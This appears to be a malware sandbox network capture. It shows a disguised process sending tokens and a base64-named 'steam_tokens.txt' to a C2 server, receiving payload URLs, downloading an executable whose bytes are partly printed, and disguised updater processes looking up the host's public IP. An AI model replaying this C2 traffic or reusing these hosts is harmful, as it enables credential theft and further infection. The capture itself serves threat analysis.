                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="message"files------BGIJEGCGDGHDHIDHDGCB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.703986883 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:16 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=82
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.714399099 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="file"------KFHCAEGCBFHJDGCBFHDA--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.910847902 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:16 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=81
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.913610935 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="message"ybncbhylepme------BKKFHIEGDHJKECAAKKEB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.110419035 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:17 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 172
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=80
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 62 47 52 74 63 79 38 32 4e 6d 5a 69 5a 6d 4e 6a 5a 44 67 7a 4e 32 46 6a 58 33 5a 68 5a 47 64 6e 5a 48 4e 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d
                                                                                                                                                                                                                                          Data Ascii: aHR0cDovLzE0Ny40NS40NC4xMDQvbGRtcy82NmZiZmNjZDgzN2FjX3ZhZGdnZHNhLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwwfDB8U3RhcnR8NHw=
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:18.542576075 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGIJEGCGDGHDHIDHDGCB--


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          6192.168.2.658519147.45.44.104802632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.322033882 CEST93OUTGET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899101019 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:17 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 391072
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfcc9-5f7a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>z*bS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!*q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899116993 CEST1236INData Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a
                                                                                                                                                                                                                                          Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#b*Tg}qB[zl_63Bu!g<NS_V?i^</*V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]L7(I"T%{
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899127007 CEST1236INData Raw: 51 79 83 92 4f a5 86 9d 0e 9d 8c 6c 26 59 fc 7c 7e 06 9f 9d c9 72 03 ab 71 a8 79 50 30 0e 12 83 b4 bd 2b d4 f0 e5 6a bc 67 66 b5 d8 bb 03 76 3d 8e 28 a4 1c 69 f5 3e c9 3f db 95 c8 2b e0 d7 5d 47 57 f3 d6 ae e9 77 14 4b 7f 7b c1 a2 f3 b2 e1 a0 db
                                                                                                                                                                                                                                          Data Ascii: QyOl&Y|~rqyP0+jgfv=(i>?+]GWwK{ZdS8Co(QXv#cI8?lfbq&=tL<r=VvX7"WS_0TC#s0f0{S\tly(x=8[r0
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899156094 CEST1236INData Raw: 54 c0 a7 c5 b4 cf 54 a6 0f da 5a 80 92 0b 34 8f 52 a1 9a fb 79 0a bf 77 e5 c0 96 a1 1d 9d 4c 60 f1 2c 1a 5d fb 2f a8 af d8 f6 04 5b a7 30 9e cd d1 d7 aa 06 38 88 4d 9d 4f 1a 48 ee 99 18 98 f8 28 6f 94 74 7a 07 b7 40 53 52 42 31 59 d9 fb 81 0a 82
                                                                                                                                                                                                                                          Data Ascii: TTZ4RywL`,]/[08MOH(otz@SRB1YDisi\&*N_+kW=Xg}Rk]Rw%y:F{'Gk:Q#1$RY4[(f2:7T~}]q7xlWyy>/u,$vD9&}uG
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899166107 CEST1236INData Raw: d8 9b c1 e5 ca f7 9c bb b1 14 45 6e 8c f9 5f 32 83 7d 2f 55 7d 6b d9 63 fd 22 aa 01 33 60 a0 0b a9 d6 be 74 ec 70 d5 a0 ba 55 f7 41 69 2f 7a c2 da a2 51 1c fb 9d e3 d2 2b 50 20 84 7b 47 ce 23 ee c5 b2 af dd f6 f5 41 89 ef ff ed 28 5f 51 1f c1 42
                                                                                                                                                                                                                                          Data Ascii: En_2}/U}kc"3`tpUAi/zQ+P {G#A(_QBY)~#y]jdzR39lkyT%lrhVOMDo|fc9phSHWI^`3%%k,%^klv<=@d5*]>gz<0
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899177074 CEST1236INData Raw: cd d8 e0 03 eb 36 4a f9 ff 1f 71 90 ef 05 ea 41 61 0f c2 fe db c1 45 73 ea b9 e5 70 8f 35 26 8d 56 21 f0 76 86 e0 fe 62 ca 2e a3 0e 63 1b ab 09 8b 15 73 5b b8 a3 78 b1 36 bc 2d af e7 ec d7 b6 01 47 63 5e 59 c2 0a 88 74 f2 04 1e 5b 14 31 ec ed b3
                                                                                                                                                                                                                                          Data Ascii: 6JqAaEsp5&V!vb.cs[x6-Gc^Yt[1Y?fIXf0Y/~n-Lf3A3k?<0nxkS_|JxLu+V%RnrP+Dc-gp6\q<9L9[X<d8xCq
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899188995 CEST1236INData Raw: a8 56 54 26 29 73 90 b8 29 a5 3c ae 7c 13 7d 6a fd 20 ba d9 d3 99 7a 31 4c 3a a3 2a d5 84 6a 78 78 ed a6 c2 07 88 aa 57 01 c2 81 77 de ba e4 2c 8a ef c9 d2 24 d4 75 2b f4 23 d8 55 4e 96 13 c9 f0 33 68 b8 33 ad f0 90 69 07 ec a5 20 9a c8 74 04 76
                                                                                                                                                                                                                                          Data Ascii: VT&)s)<|}j z1L:*jxxWw,$u+#UN3h3i tv56'KkEW_}Zy+:UTk{{DZ.([0]GeAUP0rX#R./^2q\M2tw7ot}>#@P+jx(1$u\v?
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899804115 CEST1236INData Raw: 36 20 2f e8 3e ac 38 8d 34 d8 0c 2f 9c 5e 62 be 76 06 9c d8 8c d5 38 12 6e f3 65 d7 ed 09 9c e7 c2 14 17 00 32 7a 9e e0 30 64 bc d0 7c 05 33 6a c7 53 93 eb d7 87 09 bd f3 54 ac 62 83 f3 f1 ea ea 43 2e 35 77 7c f4 c0 7c 6c 8e da 17 ed c6 60 49 c0
                                                                                                                                                                                                                                          Data Ascii: 6 />84/^bv8ne2z0d|3jSTbC.5w||l`Iukon58!qW!JrGH;D<El VB/0J$E=IJIeV1$rry8V$vk^zC0Tj_X.eU
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899815083 CEST1236INData Raw: de 38 09 f2 74 bc 62 7b 20 dd 52 20 bb 8d 85 17 01 01 fd 82 f7 77 c3 5d ab 7d d5 d8 c4 07 14 9e 24 31 a6 e0 3e d4 14 14 30 3e 80 c1 56 ff e9 fe 44 0e 50 a1 3a 6b e4 58 cf c1 55 ef 40 14 88 09 ce 27 c3 63 6d c1 db 64 0b ed 49 dd b6 64 06 f2 19 11
                                                                                                                                                                                                                                          Data Ascii: 8tb{ R w]}$1>0>VDP:kXU@'cmdIdKh-^`2-OOcjHkpckQh<.C,/y_c'{{Go\VO.UmF*=Opr{}{P)"7,=Z@#j{Q8fZ%
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.899827957 CEST1236INData Raw: e4 0f 76 98 b1 92 c2 96 08 46 0f 1f 68 ff 73 e5 5b 89 ac 9e 00 fe d3 92 56 3e b7 f4 ee 0c f9 82 5c 86 d1 9a 5b 45 c1 11 7f a9 44 02 d5 17 e0 df 06 a3 53 37 1e 94 01 6b 9b 5a 8f 79 a6 82 e1 e1 43 86 0e 12 e3 0e 92 60 a5 56 78 e2 24 02 83 aa 6b c6
                                                                                                                                                                                                                                          Data Ascii: vFhs[V>\[EDS7kZyC`Vx$kCps]$LSw?O6ET.k%D)-1c8t6/G<A@).V[@ENtHFc3o8KX;%y7Mtpuf ny%%*
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:17.904376984 CEST1236INData Raw: 84 ee 16 7c fb 48 a1 68 3c a6 f0 a8 73 de 3c ad ed f4 47 b2 ab 56 6e 9b 63 eb 98 a1 34 74 ab 0b a6 9b 9b 91 55 fa b3 7c 6a 67 35 6b 92 e4 e3 c8 05 f7 b5 d0 de 3c 96 cb 1f 7f d8 17 d2 29 b4 89 a4 d2 88 2c b0 19 ae 5e e9 e0 ad 7f dd 15 8b d6 8e 65
                                                                                                                                                                                                                                          Data Ascii: |Hh<s<GVnc4tU|jg5k<),^e,J9H%)FOK`s.^>2\qOjPE"!tL@ZT45k!tRI:QXL0} +G]Wu:Pxy+JG"F


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          7192.168.2.658528104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:24.130959988 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:24.593271017 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:24 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c726595fc3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:25.763982058 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:25.870971918 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72e583fc3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:26.228069067 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72e583fc3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:57.963573933 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:58.253490925 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:58 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7f798b5c3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:58.299268007 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:58 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7f798b5c3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.246222019 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.385138035 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:59 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7ffbf9ac3f5-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          8192.168.2.658561104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:55.309740067 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:55.784188032 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:55 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7e948f443e6-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          9192.168.2.658563104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:56.767262936 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:57.238460064 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:57 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7f26b68330c-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          10192.168.2.658568147.45.44.104806208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:59.090087891 CEST191OUTGET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1
